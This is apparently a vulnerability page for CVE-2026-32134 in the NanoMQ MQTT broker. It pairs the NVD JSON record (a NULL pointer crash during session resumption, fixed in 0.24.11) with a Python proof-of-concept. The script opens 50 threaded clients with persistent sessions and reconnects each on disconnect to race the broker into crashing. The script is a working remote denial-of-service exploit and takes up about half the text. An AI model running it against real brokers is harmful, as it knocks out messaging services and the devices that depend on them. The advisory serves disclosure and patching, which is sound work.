CVE-2026-32134

import paho.mqtt.client as mqtt import threading import time # Target configuration TARGET_IP = "127.0.0.1" TARGET_PORT = 1883 NUM_CLIENTS = 50 # High concurrency to trigger race condition # Callback when connection is established def on_connect(client, userdata, flags, rc): if rc == 0: print(f"Client {userdata} connected") # Simulate traffic or wait for disconnect else: print(f"Failed to connect, return code {rc}") # Callback when connection is lost def on_disconnect(client, userdata, rc): print(f"Client {userdata} disconnected") # Immediately attempt to reconnect to trigger race condition try: client.reconnect() except Exception as e: print(f"Reconnect error for {userdata}: {e}") def start_mqtt_client(client_id): # clean_start=False (clean_session=False) is required to trigger session restoration logic client = mqtt.Client(client_id=client_id, clean_session=False) client.on_connect = on_connect client.on_disconnect = on_disconnect client.user_data_set(client_id) try: client.connect(TARGET_IP, TARGET_PORT, 60) client.loop_start() # Keep alive for a short duration then disconnect to start the cycle time.sleep(2) client.loop_stop() client.disconnect() except Exception as e: print(f"Error in client {client_id}: {e}") if __name__ == "__main__": threads = [] print(f"Starting attack against {TARGET_IP}:{TARGET_PORT}...") # Create multiple threads to simulate concurrent reconnections for i in range(NUM_CLIENTS): client_id = f"poc_client_{i}" t = threading.Thread(target=start_mqtt_client, args=(client_id,)) t.start() threads.append(t) time.sleep(0.01) # Slight delay to stagger connections for t in threads: t.join() print("Attack finished. Check if the broker has crashed.")

{"cve": {"id": "CVE-2026-32134", "sourceIdentifier": "[email protected]", "published": "2026-05-19T18:16:21.147", "lastModified": "2026-05-19T21:08:09.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In versions 0.24.10 and below, when NanoMQ handles high-concurrency reconnect traffic using a reconnect-collision payload, the broker can crash due to a NULL pointer dereference during MQTT session resumption for clean_start=0 clients. The transport's p_peer callback (tcptran_pipe_peer()) iterates cpipe->subinfol while copying session metadata from the cached old pipe to the new reconnecting pipe, without checking whether the pointer is NULL. Under a reconnect race, cpipe->subinfol can be freed and set to NULL before session restore invokes this function, resulting in a remote unauthenticated Denial-of-Service (process crash) condition. This issue has been fixed in version 0.24.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/nanomq/NanoNNG/commit/522ec62e29e60d1122f2aedaa6e702dcf089f7bb", "source": "[email protected]"}, {"url": "https://github.com/nanomq/nanomq/issues/2241", "source": "[email protected]"}, {"url": "https://github.com/nanomq/nanomq/releases/tag/0.24.11", "source": "[email protected]"}, {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2", "source": "[email protected]"}, {"url": "https://github.com/nanomq/nanomq/issues/2241", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}